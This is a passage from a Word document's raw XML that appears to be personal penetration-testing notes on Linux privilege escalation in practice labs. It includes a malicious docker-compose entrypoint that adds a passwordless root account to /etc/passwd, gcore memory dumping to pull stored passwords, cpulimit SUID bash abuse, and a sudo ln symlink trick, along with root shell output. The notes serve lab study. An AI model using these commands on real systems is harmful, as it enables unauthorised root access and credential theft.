      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">    entrypoint: ["/bin/bash", "-c", "echo 'root2::0:0::/root:/bin/bash' &gt;&gt; /mnt/passwd &amp;&amp; tail -f /dev/null"]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002034">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">    tty: true</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002035">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If this don't work, then try giving a password to root2 user since sometimes linux doesn't allow no-password logins. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002036">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1511300"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="55" name="image50.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image50.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId692"/>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2037">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="418"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">With our malicious docker-compose.yaml in place, the final step is to run Docker Compose using sudo to apply the configuration and execute our payload:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002038">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">mcsam@SkillForge:~$ </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo /usr/bin/docker compose -f /home/mcsam/app/skillforge-docker/docker-compose.yaml up -d</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002039">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">WARN[0000] /home/mcsam/app/skillforge-docker/docker-compose.yaml: the attribute `version` is obsolete, it will be ignored, please remove it to avoid potential confusion </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000203A">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">[+] Running 1/1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000203B">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial Unicode MS" w:cs="Arial Unicode MS" w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> ✔ Container suid_bash_container  Started                                                                                                       10.4s </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000203C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000203D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="418"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And viola we become root on the target.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000203E">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">mcsam@SkillForge:~$</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> su root2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000203F">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">root@SkillForge:/home/mcsam# id</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002040">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">uid=0(root) gid=0(root) groups=0(root)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002041">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002042">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002043">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_1llwswxgzxp2" w:id="278"/>
      <w:bookmarkEnd w:id="278"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/usr/bin/gcore </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002044">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002045">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is from the </w:t>
      </w:r>
      <w:hyperlink r:id="rId693">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Pelican</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG Practice. Looking up gcore on Google we see it is an application for dumping information out of memory for running processes. You can run</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> sudo gcore $PID </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">to dump information out of a memory for that PID. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002046">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002047">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">But, the hard part is finding a process with the useful information. In the writeup, they used "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ps aux</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">" to find interesting processes, and they found "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/usr/bin/password-store</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">" (this name was cut off in this writeup but seen in other write ups). Another writeup found this by looking at the files with SUID bit set. The PID was </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">493</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002048">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1474"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo gcore &lt;PID&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002049">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1474"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">strings core.&lt;PID&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000204A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="223"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">These commands were from </w:t>
      </w:r>
      <w:hyperlink r:id="rId694">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">this</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> writeup and matched the instructions from GTFObins</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000204B">
      <w:pPr>
        <w:ind w:left="1440" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000204C">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Here is another way to dump and read:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000204D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1474"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo -u root /usr/bin/gcore -a -o &lt;outputfile&gt; &lt;pid&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000204E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1474"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">strings &lt;outputfile&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000204F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="983"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The commands were from </w:t>
      </w:r>
      <w:hyperlink r:id="rId695">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">this</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> writeup</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002050">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002051">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002052">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_7i529t39a1bs" w:id="279"/>
      <w:bookmarkEnd w:id="279"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/usr/bin/cpulimit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002053">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1377"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In the </w:t>
      </w:r>
      <w:hyperlink r:id="rId696">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">OnSystemShellDredd</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PG Play, we saw /usr/bin/cpulimit with sudo privileges</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002054">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1377"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">They used a sequence of commands much different than GTFO Bins</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002055">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1377"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cpulimit -l 100 -f chmod +s bash</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002056">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1377"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/bin/bash -p</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002057">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002058">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_4lw0b5ouox0r" w:id="280"/>
      <w:bookmarkEnd w:id="280"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/usr/bin/ln</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002059">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:hyperlink r:id="rId697">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Seppuku</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG Play:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000205A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="262"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Had one user with "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">(ALL) NOPASSWD: /usr/bin/ln -sf /root/ /tmp/</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">" </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000205B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="262"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/usr/bin/ln creates symbolic links</w:t>
      </w:r>
    </w:p>
